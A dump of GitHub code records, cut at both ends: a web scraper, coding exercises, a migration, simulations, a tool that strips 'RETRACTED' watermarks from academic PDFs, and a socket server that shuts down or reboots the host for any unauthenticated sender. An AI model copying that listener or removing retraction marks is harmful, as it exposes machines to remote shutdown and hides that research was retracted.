get_content_links(soup):\n\tcontentDiv = soup.select_one(\"div .content-wrap\")\n\treturn [link.get('href') for link in contentDiv.find_all('a') \n\t\t\tif link.get('href') is not None and link.get('href').lower().startswith('/conditions')]\n\ndef get_condition_links(soup):\n\treturn [link.get('href') for link in soup.find_all('a') if link.get('href').lower().startswith('/conditions')]\n\ndef get_page_content(soup):\n\t#remove javascript and styles\n\tfor script in soup(['script','style']):\n\t\tscript.decompose()\n\ttext = soup.get_text()\n\n\t#remove unnecessary spaces\n\ttext = re.sub('\\s+',' ',text)\n\n\treturn text.strip()\n\ndef get_model(soup,url):\n\treturn PageInfoModel(soup.title.string,url,get_page_content(soup))\n\ndef run(args):\n\telasticsearchServer = args[0] if len(args) else 'localhost:9200'\n\tindexName = 'nhs_conditions'\n\tdocType = 'condition'\n\n\tes = Elasticsearch(elasticsearchServer)\n\tes.indices.delete(index=indexName, ignore=[400,404])\n\n\tf = open('nhsPageContent','w')\n\tf.write('[')\n\tfor model in get_pages_info_models('http://www.nhs.uk/Conditions/Pages/hub.aspx'):\n\t\tjson = model.to_json()\n\t\tes.index(index=indexName, doc_type=docType, body=json)\n\t\tf.write(json + \",\\n\")\n\t\n\tf.write(']')\n\tf.close()\n\tes.indices.refresh(index=indexName)\n\nif __name__ == '__main__':\n\trun(sys.argv[1:])\n\t","repo_name":"snava10/nhs-crawler","sub_path":"nhsWebScraper.py","file_name":"nhsWebScraper.py","file_ext":"py","file_size_in_byte":2397,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"78"} +{"seq_id":"26910092173","text":"# 树的子结构\n\n# 输入两棵二叉树A,B,判断B是不是A的子结构。(ps:我们约定空树不是任意一个树的子结构)\n\n######################################################################\nclass TreeNode:\n def __init__(self, x):\n self.val = x\n self.left = None\n self.right = None\n\ndef stringToTreeNode(input):\n input = input.strip()\n input = input[1:-1]\n if not input:\n return None\n\n inputValues = [s.strip() for s in input.split(',')]\n root = TreeNode(int(inputValues[0]))\n nodeQueue = [root]\n front = 0\n index = 1\n while index < len(inputValues):\n node = nodeQueue[front]\n front = front + 1\n\n item = inputValues[index]\n index = index + 1\n if item != \"null\":\n leftNumber = int(item)\n node.left = TreeNode(leftNumber)\n nodeQueue.append(node.left)\n\n if index >= len(inputValues):\n break\n\n item = inputValues[index]\n index = index + 1\n if item != \"null\":\n rightNumber = int(item)\n node.right = TreeNode(rightNumber)\n nodeQueue.append(node.right)\n return root\n######################################################################\n# -*- coding:utf-8 -*-\nclass Solution:\n def HasSubtree(self, pRoot1, pRoot2):\n if not pRoot1 or not pRoot2:\n return False\n return self.classifytree(pRoot1,pRoot2) or self.HasSubtree(pRoot1.left,pRoot2) or self.HasSubtree(pRoot1.right,pRoot2)\n def classifytree(self, tree1,tree2):\n if not tree2:\n return True\n if not tree1 or tree1.val != tree2.val:\n return False\n return self.classifytree(tree1.left,tree2.left) and self.classifytree(tree1.right,tree2.right)\n # write code here\n\n######################################################################\ntree = '[3,9,20,null,null,15,7]'\nBtree = stringToTreeNode(tree)","repo_name":"EugenenZhou/leetcode","sub_path":"nowcoder/jzoffer/HasSubtree.py","file_name":"HasSubtree.py","file_ext":"py","file_size_in_byte":1951,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"78"} +{"seq_id":"28852261476","text":"import copy\nfrom cellular_automata_rules import next_step_cell\nfrom cell import Cell\n\ndef init_board(density, width, height, rng):\n \"\"\"\n Initialises a board\n :param density: float between 0 and 1, representing how many cells are alive at the start at most\n :param rng: a random.Random object responsible for providing the random numbers\n :return: 2D array of cells, randomly put on the field\n \"\"\"\n print(rng.getstate())\n board = [[Cell.DEAD for i in range(width)] for j in range(height)]\n for i in range(int(width * height * density)):\n x, y = rng.randint(0, width - 1), rng.randint(0, height - 1)\n board[y][x] = Cell.ALIVE\n return board\n\ndef next(board):\n \"\"\"\n Runs one step of the cellular automata\n :param board: 2D array of cells, representing the initial state of the board\n :return: 2D array of cells, representing the next state\n \"\"\"\n next_board = copy.deepcopy(board) # All cells evolve at the same time so we store their next state before updating them all\n for i in range(len(board)):\n for j in range(len(board[0])):\n next_board[i][j] = next_step_cell([[board[(i+k) % len(board)][(j+l) % len(board[0])] for k in range(-1, 2)] for l in range(-1, 2)]) # Gets the neighborhood of the cell, including itself\n for i in range(len(board)):\n for j in range(len(board[0])):\n board[i][j] = next_board[i][j] # Updates the initial board\n return board\n","repo_name":"MOLLARDAmbre/game-of-life-battle","sub_path":"cellular_automata.py","file_name":"cellular_automata.py","file_ext":"py","file_size_in_byte":1459,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"37935920663","text":"\"\"\"empty message\r\n\r\nRevision ID: d11eb19bd206\r\nRevises: 15aa4eba5862\r\nCreate Date: 2017-11-01 14:48:23.518755\r\n\r\n\"\"\"\r\nfrom alembic import op\r\nimport sqlalchemy as sa\r\n\r\n\r\n# revision identifiers, used by Alembic.\r\nrevision = 'd11eb19bd206'\r\ndown_revision = '15aa4eba5862'\r\nbranch_labels = None\r\ndepends_on = None\r\n\r\n\r\ndef upgrade():\r\n # ### commands auto generated by Alembic - please adjust! ###\r\n op.create_table('email_messages',\r\n sa.Column('email_message_id', sa.Integer(), nullable=False),\r\n sa.Column('recipient', sa.String(length=100), nullable=False),\r\n sa.Column('subject', sa.String(length=255), nullable=True),\r\n sa.Column('text', sa.Text(), nullable=True),\r\n sa.Column('html', sa.Text(), nullable=True),\r\n sa.Column('is_sent', sa.Boolean(), nullable=True),\r\n sa.Column('last_error', sa.Text(), nullable=True),\r\n sa.Column('created_on', sa.DateTime(), nullable=True),\r\n sa.PrimaryKeyConstraint('email_message_id')\r\n )\r\n # ### end Alembic commands ###\r\n\r\n\r\ndef downgrade():\r\n # ### commands auto generated by Alembic - please adjust! ###\r\n op.drop_table('email_messages')\r\n # ### end Alembic commands ###\r\n","repo_name":"merab-sulimov/Flask-sample","sub_path":"migrations/versions/d11eb19bd206_.py","file_name":"d11eb19bd206_.py","file_ext":"py","file_size_in_byte":1164,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"8706862243","text":"# Programa para verificar el cuadrante de una coordenada.\n\n# Aqui digitamos una variable fundamental a ser estudiada por la funcion evaluar_variable_uno()\n\nvariable_numeros = '-123456789.'\n\n# Esta funcion ayudará a verificar que el usuario no digite mal un dato de tipo numerico o float al momento de digitar coordenadas para\n# estudiar sus cuadrantes en el que se encuentren\ndef evaluar_variable_uno(param,variable):\n cont = 0\n if(param.count('.') > 1 or param.count('-') > 1 or param == '0'):\n cont += 1\n for i in param:\n # el objetivo de esta condicional esque si se cumple almenos una vez la condición, se le aumentará un uno, y para esta \n # variable (cont_tres) solo basta con un uno para indicar que hay un error en el dato del usuario\n if(i not in variable):\n cont += 1\n return int(cont)\n\ndef evaluar_variable_dos(cadena):\n while(evaluar_variable_uno(cadena,variable_numeros)>0):\n cadena = input('Favor de intentarlo de nuevo: ')\n return float(cadena)\n\n# Estas variables se usaran a lo largo de este programa para que al preguntarle al usuario de si le gusto o no el programa, estas \n# cuenten de uno en uno las cantidad de valoraciones ya sean positivas o negativas dependiendo de si el usuario responde con un \"Y\" o un\n# \"N\" (en ingles yes o no)\ncont = 0; cont_seg = 0\n\n# Esta funcion ayudará a verificar para cuando al usuario le toqué responder de si quiere trabajar en el plano 3D o 2D, ya que si llega-\n# rá a responder algo diferente de los incisos a) ó b), le lanzará al usuario que debe digitar su respuesta de nuevo.\ndef leervar_curt(param,letra_uno,letra_dos,letra_tres,letra_cuatro):\n while(param != letra_uno and param != letra_dos and param != letra_tres and param != letra_cuatro):\n param = input(f'Favor de ingresar de nuevo el dato por favor ({letra_uno}/{letra_tres}): ')\n return param\n \n# Esta es la función dedicada a leer coordenadas de tipo 2D en caso de que el usuario digite la \"a\" para el inciso a) \ndef CalC_Cuad():\n x = input('Favor de digitar la coordenada en \"X\": ')\n # Usamos la funcion evld_var() para validar el dato de manera correcta\n x = evaluar_variable_dos(x) \n y = input('Favor de digitar la coordenada en \"Y\": ')\n y = evaluar_variable_dos(y)\n \n # Y de a cuerdo a las condiciones en las que se encuentre la coordenada, verificará a que cuadrante peertenece\n if(x > 0 and y > 0):\n print('Su punto se encuentra en el cuadrante I')\n elif(x < 0 and y > 0):\n print('Su punto se encuentra en el cuadrante II')\n elif(x < 0 and y < 0):\n print('Su punto se encuentra en el cuadrante III')\n elif(x > 0 and y < 0):\n print('Su punto se encuentra en el cuadrante IV')\n\n# Esta es la función dedicada a leer coordenadas de tipo 3D en caso de que el usuario digite la \"b\" para el inciso b)\ndef CalC_Cuad_seg():\n x = input('Favor de digitar la coordenada en \"X\": ')\n # Aplicamos las mismas logicas que con la CalC_Cuad()\n x = evaluar_variable_dos(x)\n \n y = input('Favor de digitar la coordenada en \"Y\": ')\n y = evaluar_variable_dos(y)\n \n z = input('Favor de digitar la coordenada en \"Z\": ')\n # Solo que esta vez agregandole la coordenada 3ra en z\n z = evaluar_variable_dos(z)\n \n # Y en esta ocasión evaluará pero para un octante\n if(x > 0 and y > 0 and z > 0):\n print('Su punto se encuentra en el octante I')\n elif(x > 0 and y < 0 and z > 0):\n print('Su punto se encuentra en el octante IV')\n elif(x < 0 and y > 0 and z > 0):\n print('Su punto se encuentra en el octante II')\n elif(x < 0 and y < 0 and z > 0):\n print('Su punto se encuentra en el octante III')\n elif(x > 0 and y > 0 and z < 0):\n print('Su punto se encuentra en el octante V')\n elif(x > 0 and y < 0 and z < 0):\n print('Su punto se encuentra en el octante VIII')\n elif(x < 0 and y > 0 and z < 0):\n print('Su punto se encuentra en el octante VI')\n elif(x < 0 and y < 0 and z < 0):\n print('Su punto se encuentra en el octante VII')\n\n \nanswer = 's'\nwhile(answer == 's' or answer == 'S'):\n print(\"\"\"En que plano desea trabajar? \na) Plano 2D,\\tb) Plano 3D\"\"\")\n # preguntamos por el plano (a o b) en el que desea trabajar\n answer = input('Digite su respuesta (a/b): ')\n # nos aseguramos de que sea correcta entre \"a\" ó \"b\"\n answer = leervar_curt(answer,'A','a','B','b')\n # Y nos enfocamos en llamar a la función correcta de a cuerdo al inciso que haya digitado\n if(answer == 'a' or answer == 'A'):\n CalC_Cuad()\n elif(answer == 'b' or answer == 'B'):\n CalC_Cuad_seg()\n # Valoramos la experiencia que haya tenido nuestro usuario\n answer = input('Le gusto nuestro servicio (S/N)? ')\n answer = leervar_curt(answer,'S','s','N','n')\n \n # Luego de asegurarnos de que haya respondido bien entre \"y\" o \"n\" con leervar_quint(), dependiendo de la respuesta,\n # le sumamos de uno en uno a alguna de nuestras variables anteriormente explicadas\n if(answer == 's' or answer == 'S'):\n cont += 1\n elif(answer == 'n' or answer == 'N'):\n cont_seg += 1\n answer = input('Desea volver a intentarlo (S/N)? ')\n answer = leervar_curt(answer,'S','s','N','n')\nif(cont > cont_seg):\n conclusión = 'A la gente le gusto mas el programa de lo que no le gusto'\nelif(cont_seg > cont):\n conclusión = 'A la gente le desagrado mas el programa de lo que le gusto'\nelse:\n conclusión = 'A la gente le gusto el programa tanto como no le gusto'\nprint(f'''\\n Has llegado al final del programa\nValoraciones buenas: {cont}\nValoraciones malas: {cont_seg}\nConclusión Final: {conclusión}\n''')\n\n#################################################################################################################################\n\n# Programa para medir la longitud de una palabra\n\nanswer = 's'\nwhile(answer == 'S' or answer == 's'):\n palabra = input('Digite su correspondiente palabra: ')\n cantidad = len(palabra)\n \n if(cantidad >= 4 and cantidad <= 8):\n print(f'Su palabra \"{palabra}\" es ¡CORRECTO!')\n elif(cantidad < 4):\n print(f'Hacen falta letras. Solo tiene \"{cantidad}\" letras.')\n elif(cantidad > 8):\n print(f'Sobran letras. Tiene \"{cantidad}\" letras.')\n \n answer = input('Le gustaria volver a intentarlo (S/N)? ')\n answer = leervar_curt(answer,'S','s','N','n')\n\nprint('Usted ya ha llegado al final del programa, gracias por su visita.')","repo_name":"JohnCard/Proyectos-del-modulo-2","sub_path":"Juan Carlos_Sanchez Martinez_proyectoM2.py","file_name":"Juan Carlos_Sanchez Martinez_proyectoM2.py","file_ext":"py","file_size_in_byte":6495,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"35954039079","text":"from PyPDF4 import PdfFileReader, PdfFileWriter\nfrom PyPDF4.pdf import ContentStream, PageObject\nfrom PyPDF4.generic import TextStringObject, NameObject, IndirectObject\nfrom PyPDF4.utils import b_\nfrom PyPDF4.utils import PyPdfError\n\n\n# PyMuPDF\nimport fitz\n\nfrom collections import Counter\nfrom typing import Dict, List, Optional, Tuple\n\n\ndef fix_recursive_IndirectObject(\n obj: object) -> object:\n \"\"\"\n Resolve all IndirectObject attribution in a recursive fashion\n \"\"\"\n if not isinstance(obj, IndirectObject):\n return obj\n\n obj = obj.getObject()\n\n for key, val in obj.items():\n obj[key] = fix_recursive_IndirectObject(val)\n return obj\n\ndef fig_covers_entiry_page(\n page: PageObject,\n source: PdfFileReader,\n operand: str,\n p_covered: int = 0.95) -> bool:\n \"\"\"\n Check if a figure cover more than 0.95 of a page\n if so, the image will be considerated as watermark\n\n Args:\n page: PyPDF page object\n source: PyPDF file reader\n operand: PDF Stream Operand name addressing the figure\n p_covered: percentage of accepted coverage of the figure over the page\n \"\"\"\n\n page_height = int(page.mediaBox.getHeight())\n page_width = int(page.mediaBox.getWidth())\n\n wm_operation_blocks, content = find_watermark_stack_block(page, source, [operand], aggressive=1)\n fig_width = 0\n fig_height = 0\n for p in wm_operation_blocks:\n # Check the cm operator found in the watermark stack block\n # This is riscky since we are supposing that the stram PDF operations\n # are well organized and with only one 'cm' operand in the watermark rendering stack block\n # Fig_width and Fig_height are the scaling factor (in x and y) presented in the\n # current transformation matrix (CTM)\n if len(content.operations[p][0]) == 6:\n fig_width = content.operations[p][0][0]\n fig_height = content.operations[p][0][3]\n break\n\n # If the minimum percentage among the position of the figure is more than\n # 0.95, the image is a watermark\n if min((fig_height/page_height), (fig_width / page_width) > p_covered):\n return True\n return False\n\ndef get_page_resources_watermarks(\n page: PageObject,\n source: PdfFileReader) -> List:\n \"\"\"\n Return all operands keys from a PDF page Resource that might be\n from a watermark, i.e. named resources /Fm0 and /X0\n \"\"\"\n\n if page.get('/Resources') is None:\n return []\n if page['/Resources'].get('/XObject') is None:\n return []\n\n xobject = page['/Resources']['/XObject'].getObject()\n\n wm_keys = []\n for key in xobject.keys():\n #Usally the softwares like Adobe insert the watermark as a\n # named resource name as Fm, na dwith a information claiming\n # that this resource is a watermark\n if '/fm' in key.lower():\n info = xobject[key].get('/PieceInfo')\n if info is None:\n continue\n info = fix_recursive_IndirectObject(info)\n # If watermark found, include it to watermark_keys\n if ('watermark' in str(info).lower()) or \\\n 'background' in str(info).lower():\n wm_keys.append(key)\n\n # Some Academic mistakely add the watermark to the PDF\n # As a form, without adding the informatio of watermark\n elif '/x' in key.lower():\n info = xobject[key].get('/Subtype')\n info = fix_recursive_IndirectObject(info)\n if 'form' in str(info).lower():\n wm_keys.append(key)\n if fig_covers_entiry_page(page, source, key):\n wm_keys.append(key)\n\n return wm_keys\n\ndef get_GS_watermark_from_pdf(\n source: PdfFileReader) -> List:\n \"\"\"\n This function tends to admit a watermark more aggresived by\n looking at the graphic /GS from the ExtGState\n\n So, it scans all pages from PDF File Source\n checking the number of GS operation frequency\n in more than one page. Each GS that\n occurs in more than one page, we assume that it is a\n watermark. It works, but can cause some false-positive.\n \"\"\"\n # Initialize extGstates\n extGstates = []\n\n # Check Gs along the pdf document\n for page in range(source.getNumPages()):\n page = source.getPage(page)\n if not page.get('/Resources'):\n continue\n if not page['/Resources'].get('/ExtGState'):\n continue\n extGstates += list(page['/Resources']['/ExtGState'].keys())\n\n # Count the occurrence of each Gs along the source pdf\n watermarks = []\n for key, occ in Counter(extGstates).items():\n if occ > 1:\n watermarks.append(key)\n\n return watermarks\n\ndef get_operands_watermarks_list(\n source: PdfFileReader,\n aggressive: int):\n \"\"\"\n According to the user aggresive will, returns the stream operands names\n that might be considerated as watermarks.\n\n Args:\n source: PyPDF file reader\n aggressive: Integer in [1,3]\n \"\"\"\n\n # Check the GS operators\n # Our heuristic is that if the GS appears in more then\n # one page, then it should be considerated as a watermark\n watermarks = get_GS_watermark_from_pdf(source) if aggressive> 1 else []\n for page in range(source.getNumPages()):\n page = source.getPage(page)\n watermarks += get_page_resources_watermarks(page, source)\n\n watermarks = list(set(watermarks))\n return watermarks\n\ndef check_blockqQ_has_watermark(\n block: ContentStream ,\n watermarks: List)-> bool:\n \"\"\"\n Check if the rendering watermark instruction\n is present in the Stream block.\n We are assuming that the blocks are within 'q' 'Q' structure instruction stack\n \"\"\"\n\n for (operands, _) in block:\n\n # operands is a list of operand\n for op in operands:\n if not isinstance(op, str):\n continue\n if op in watermarks:\n return True\n\n return False\n\ndef find_watermark_stack_block(\n page: PageObject,\n source: PdfFileReader,\n watermarks: List,\n aggressive: int) -> Tuple[List, ContentStream]:\n \"\"\"\n Find the all blocks of instructions stacks within the 'q' 'Q'\n that the Watermark instruction is involved\n\n Args:\n page: PyPDF page object\n source: PyPDF file reader\n watermarks: List of watermark operand names inside the PDF\n aggressive: Integer in [1,3]\n \"\"\"\n\n # Check if page has contents\n if page.get(\"/Contents\") is None:\n return [], None\n\n # q Q stack blocks with watermarks\n wm_blocksqQ = []\n\n Found = False\n index_op = 0\n # Get content objects id\n content_object = page[\"/Contents\"].getObject()\n # Retrive contents stream\n content = ContentStream(content_object, source)\n\n # For each operand check if it a q, if yes start a new\n # block, inserting the indeces and the operations involved\n # in lists.\n # If for any reason an operand of a Image (Im) or a text (BT)\n # is found, we will ignore that block, even if it contains a watermark;\n # otherwise we would erase valid information from the PDF.\n\n # If the Aggressive is more than 2, we don't check if the stack of intructions operands\n # have a watermark's operand or not, we include everthing that either isn't a text\n # nor a image as a watermark block of instruction.\n for operands, operator in content.operations:\n\n if Found:\n new_block_indeces.append(index_op)\n new_block_ops.append((operands, operator))\n\n if operator == b_('q'):\n Found = True\n new_block_indeces = [index_op]\n new_block_ops = [(operands, operator)]\n\n if type(operands) is list:\n if len(operands)>0:\n if isinstance(operands[0], NameObject):\n name = str(operands[0]).lower()\n if '/im' in name:\n Found = False\n new_block_indeces = []\n new_block_ops = []\n\n if operands == b_('BT'):\n Found = False\n new_block_indeces = []\n new_block_ops = []\n\n if operator == b_('Q') and Found:\n Found = False\n # If aggressive is more than 3, include even blocks that\n # don't have explicit a watermark operand to be erased\n if aggressive <=2:\n if check_blockqQ_has_watermark(new_block_ops, watermarks):\n wm_blocksqQ += new_block_indeces\n else:\n wm_blocksqQ += new_block_indeces\n\n index_op += 1\n\n return wm_blocksqQ, content\n\n\ndef remove_watermark_from_page(\n page: PageObject,\n source: PdfFileReader,\n watermarks: List,\n aggressive: int) -> Tuple[PageObject, ContentStream]:\n \"\"\"\n Considering the list 'watermark' of operand names consideraded as\n Watermark Resources, find all stack of rendering instruction that it participates\n and remove them from the page\n\n Args:\n page: PyPDF page object\n source: PyPDF file reader\n watermarks: List of watermark operand names inside the PDF\n aggressive: Integer in [1,3]\n \"\"\"\n\n wm_operation_blocks, content = find_watermark_stack_block(page, source, watermarks, aggressive)\n\n non_wm_blocks = []\n if not content is None:\n for ops_index, ops in enumerate(content.operations):\n if ops_index in wm_operation_blocks:\n continue\n non_wm_blocks.append((ops))\n\n # Update Page content with non watermark blocks\n content.operations = non_wm_blocks\n page.__setitem__(NameObject('/Contents'), content)\n\n\n\n if page.get('/Resources') is None:\n return page, content\n\n # Remove watermarks from the page resources\n for wm in watermarks:\n\n if page['/Resources'].get('/XObject'):\n if wm in page['/Resources']['/XObject'].keys():\n page['/Resources']['/XObject'].pop(wm)\n\n if page['/Resources'].get('/ExtGState'):\n if wm in page['/Resources']['/ExtGState'].keys():\n page['/Resources']['/ExtGState'].pop(wm)\n\n return page, content\n\ndef remove_graphical_watermarks_from_contents(\n page: PageObject,\n source: PdfFileReader) -> PageObject:\n \"\"\"\n This is a more aggressive watermark removal function.\n It removes all graphical operator instruction from a page stream\n Args:\n page: PyPDF page object\n source: PyPDF file reader\n Return:\n page\n \"\"\"\n\n graph_operators = ['f', 'F','B', 'B*', 'b', 'b*', 'n', 'W', 'W*','m',\n 'l', 'c', 'v', 'y', 'h', 're',]\n if page.get('/Contents') is None:\n return page\n\n # Get content objects id\n content_object = page[\"/Contents\"].getObject()\n # Retrive contents stream\n content = ContentStream(content_object, source)\n\n # List of non graphical operations, remainded\n non_graphical_operations = []\n\n # Analyze each operation, keep only the non graphical ones\n for operands, operator in content.operations:\n if not operator in [b_(i) for i in graph_operators]:\n non_graphical_operations.append((operands, operator))\n\n # update content operations\n content.operations = non_graphical_operations\n page.__setitem__(NameObject('/Contents'), content)\n\n return page\n\ndef remove_retracted_watermarks_letters(\n page: PageObject,\n content: ContentStream) -> PageObject:\n \"\"\"\n This is a watermark removal function.\n It replaces the word \"RETRACTED\" from the page text\n by \"\".\n Args:\n page: PyPDF page object\n source: PyPDF file reader\n Return:\n page\n \"\"\"\n\n if content is None:\n return page\n\n\n # Check if the 'retracted' term appears in the text\n operations = []\n for operands, operator in content.operations:\n\n # TJ or Tj flags the occurence of a text term\n if operator == b_(\"TJ\") or operator == b_('Tj'):\n text = operands\n\n if not text:\n operations.append((operands, operator))\n continue\n\n if isinstance(text[0], list):\n text = \" \".join([str(i) for i in text])\n\n elif isinstance(text[0], str):\n text = text[0]\n\n else:\n operations.append((operands, operator))\n continue\n\n if (\"retracted\" in text.lower()) and len(text)< 30:\n operands = TextStringObject('')\n\n operations.append((operands, operator))\n\n content.operations = operations\n\n # update content operations\n page.__setitem__(NameObject('/Contents'), content)\n\n return page\n\ndef fitz_solvent_watermarks(\n input_pdf: str,\n output_pdf: str):\n \"\"\"\n Use the PyMuPDF function to remove watermark\n\n In case PyPDF fails, we use the solution from PyMupdf\n REFERENCE: https://github.com/pymupdf/PyMuPDF/issues/468#issuecomment-601142235\n\n Args:\n input_pdf: str,\n output_pdf: str):\n\n \"\"\"\n doc = fitz.open(input_pdf)\n\n for page in doc:\n\n page.cleanContents() # cleanup page painting commands\n\n if len(page.getContents()) > 0:\n xref = page.getContents()[0] # get xref of the resulting source\n cont0 = doc.xrefStream(xref).decode().splitlines() # and read it as lines of strings\n cont1 = [] # will contain reduced cont lines\n found = False # indicates we are inside watermark instructions\n\n for line in cont0:\n\n if line.startswith(\"/Artifact\") and ((\"/Background\" in line) or (\"/Watermark\" in line)): # start of watermark\n found = True # switch on\n continue # and skip line\n if found and line == \"EMC\": # end of watermark\n found = False # switch off\n continue # and skip line\n if found is False: # copy commands while outside watermarks\n cont1.append(line)\n\n cont = \"\\n\".join(cont1) # new paint commands source\n doc.updateStream(xref, cont.encode()) # replace old one with 'bytes' version\n\n # Removing annotationg, just in case\n annot = page.firstAnnot\n while annot:\n annot = page.deleteAnnot(annot)\n\n doc.save(output_pdf) # original uses garbage=4\n\ndef remove_watermarks(\n inputFile: str,\n outputFile: str,\n aggressive: int = 2):\n \"\"\"\n Removes 'RETRACTED' watermarks from Academic PDF articles.\n\n This function has three levels of aggressivity; as higher the level more damage it can cause to the final result.\n Even though, even for the maximum level of aggressivity, the images/photos embedded in the PDF are preserved.\n\n Aggressivity Level 1:\n All PDF stream resources that explicitly contain the information saying that it is a Watermark are removed.\n\n Aggressivity Level 2:\n All Watermarks from 1 and element Graphics that appear more than once along the PDF pages are removed.\n In addition, all 'RETRACTED' words are also removed.\n For some PDFs, this aggressivity level could remove the entire text from a Page.\n\n Aggressivity Level 3:\n All WM from 1 and 2 and all graphical elements are removed from the PDF.\n The only change for the Retraction Watermark not to be removed with such a level of aggressivity is the Retraction Watermark embedded as an Image File.\n In this case, we will preserve the Watermark since this function is designed not to erase any image/photo from the PDF.\n \"\"\"\n\n try:\n with open(inputFile, \"rb\") as f:\n source = PdfFileReader(f, \"rb\")\n output = PdfFileWriter()\n\n watermarks = get_operands_watermarks_list(source, aggressive)\n watermarks = list(set(watermarks))\n\n #TODO\n # Process the followint FOR in parallel\n for page in range(source.getNumPages()):\n page = source.getPage(page)\n if aggressive >0:\n page, content = remove_watermark_from_page(page, source, watermarks, aggressive)\n if aggressive >1:\n page = remove_retracted_watermarks_letters(page, content)\n if aggressive > 2:\n page = remove_graphical_watermarks_from_contents(page, source)\n output.addPage(page)\n\n with open(outputFile, \"wb\") as outputStream:\n output.write(outputStream)\n\n except PyPdfError:\n print(\"PyPDFError trying Pymupdf\")\n fitz_solvent_watermarks(inputFile, outputFile)\n\n","repo_name":"phillipecardenuto/watermark-removal","sub_path":"PDFSolvent/PDFSolvent.py","file_name":"PDFSolvent.py","file_ext":"py","file_size_in_byte":16708,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"78"} +{"seq_id":"11931031607","text":"import networkx as nx\nimport numpy as np\nimport scipy as sp\nimport random as rd\nimport matplotlib\nmatplotlib.use('QT5Agg')\nimport matplotlib.pyplot as plt\n\ndef random_triade(G):\n nodes = G.nodes().copy()\n triade_nodes = np.random.choice(nodes, size=3, replace=False)\n triade = nx.subgraph(G, triade_nodes)\n return triade\n\ndef is_balanced(triade): \n return True if (-1)**(3 - triade.number_of_edges()) == 1 else False\n\ndef imbalanced_triade(G, limit=1000):\n for i in range(limit):\n triade = random_triade(G)\n if not is_balanced(triade): return triade\n return None\n\ndef num_imbalanced_triades(G):\n num = 0\n nodes = G.nodes()\n for n1 in nodes[:-2]:\n for n2 in nodes[n1+1:-1]:\n for n3 in nodes[n2+1:]:\n if not is_balanced(nx.subgraph(G, [n1, n2, n3])): num += 1\n return num\n\ndef balance_triade_in_graph(G, triade, p):\n edges = triade.edges().copy()\n nodes = triade.nodes().copy()\n if len(edges) == 0: \n G.add_edge(*np.random.choice(nodes, size=2, replace=False))\n else:\n if np.random.random() < p:\n comp = nx.complement(triade)\n G.add_edge(*comp.edges()[0])\n else:\n G.remove_edge(*rd.choice(edges))\n\n\ndef original_graph():\n romeos_family = nx.complete_graph(5)\n julias_family = nx.complete_graph(5)\n # The families clash <- aw, not good!\n family_fight = nx.disjoint_union(romeos_family, julias_family)\n # ... but Romeo and Julia make love nevertheless\n family_fight.add_edge(0, 9)\n return family_fight\n\n\ndef destiny(p=1./3.):\n family_fight = original_graph()\n \n i = 0\n while True:\n triade = imbalanced_triade(family_fight, limit = 1000)\n if triade == None:\n n = num_imbalanced_triades(family_fight)\n if n == 0: break\n else: balance_triade_in_graph(family_fight, triade, p)\n return family_fight\n\n\ndef family_positions():\n positions = []\n for i in range(0, 5):\n positions.append( (-1 + 0.75*np.cos((i-0)/5*2*np.pi), \n 0.75*np.sin((i-0)/5*2*np.pi)) )\n for i in range(5, 10):\n positions.append( ( 1 - 0.75*np.cos((i-9)/5*2*np.pi),\n 0.75*np.sin((i-9)/5*2*np.pi)) )\n return positions\n\n\ndef destinies(times=1000, p=1./3.):\n num_love = 0\n fracs = np.zeros(times)\n for j in range(times):\n family_fight = original_graph()\n \n i = 0\n while True:\n triade = imbalanced_triade(family_fight, limit = 1000)\n if triade == None:\n n = num_imbalanced_triades(family_fight)\n if n == 0: break\n else: balance_triade_in_graph(family_fight, triade, p)\n if family_fight.has_edge(0, 9): \n print(\"Destiny %d:\" % (j+1,), \"Love\")\n num_love += 1\n else: print(\"Destiny %d:\" % (j+1,), \"Hate\")\n fracs[j] = num_love/(j+1)\n print(\"Fraction: %f\" % (fracs[j],))\n return num_love/times, fracs, family_fight\n \n#P = np.linspace(0.1, 0.6, 20)\n#fracs = np.array( [ destinies(p=p)[0] for p in P ] )\n\n\n\n","repo_name":"tscode/Network-Science","sub_path":"D/python/D41.py","file_name":"D41.py","file_ext":"py","file_size_in_byte":3122,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"13849972702","text":"from socket import *\nimport os\nimport platform\n\nhost = \"192.168.43.117\"\nport = 9999\n\ns = socket(AF_INET,SOCK_STREAM)\ns.bind((host,port))\ns.listen(5)\n\nwhile True:\n c,addr = s.accept()\n type = c.recv(1024).decode('utf-8')\n if type==\"shutdown\":\n os.system(\"shutdown /f\")\n elif type==\"restart\":\n if platform.system()==\"Windows\":\n os.system(\"shutdown /r\")\n elif platform.system()==\"Linux\":\n os.system(\"shutdown -r\")\n elif type==\"music\":\n if platform.system()==\"Windows\":\n os.system(\"D:\\\\1.mp3\")\n elif platform.system()==\"Linux\":\n os.system(\"~/1.mp3\") \n \n","repo_name":"JayantGoel001/CYC","sub_path":"app/src/main/java/com/example/cyc/Server/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":646,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"78"} +{"seq_id":"15780900565","text":"\"\"\"\n8-4. Large Shirts: Modify the make_shirt() function so that shirts are large\nby default with a message that reads I love Python. Make a large shirt and a\nmedium shirt with the default message, and a shirt of any size with a different\nmessage.\n\"\"\"\n\n\ndef make_shirt(text, size='large'):\n print(f\"The size of the shirt is {size}.\")\n print(f\"The text should be printed is '{text.title()}'.\")\n\n\nmake_shirt(text='i love python')\nmake_shirt(text='i love linux', size='small')\n\n","repo_name":"t4chik0m4/Curso_Python","sub_path":"Chapter_8/Passing_Arguments/exercise/large_shirts.py","file_name":"large_shirts.py","file_ext":"py","file_size_in_byte":480,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"13301847672","text":"import numpy as np\nimport numpy.linalg as LA\nimport cPickle as pk\nfrom glob import glob\nfrom os import makedirs, remove\nfrom os.path import join, exists, abspath, dirname, basename, isfile\n\nimport pinocchio as pin\nfrom 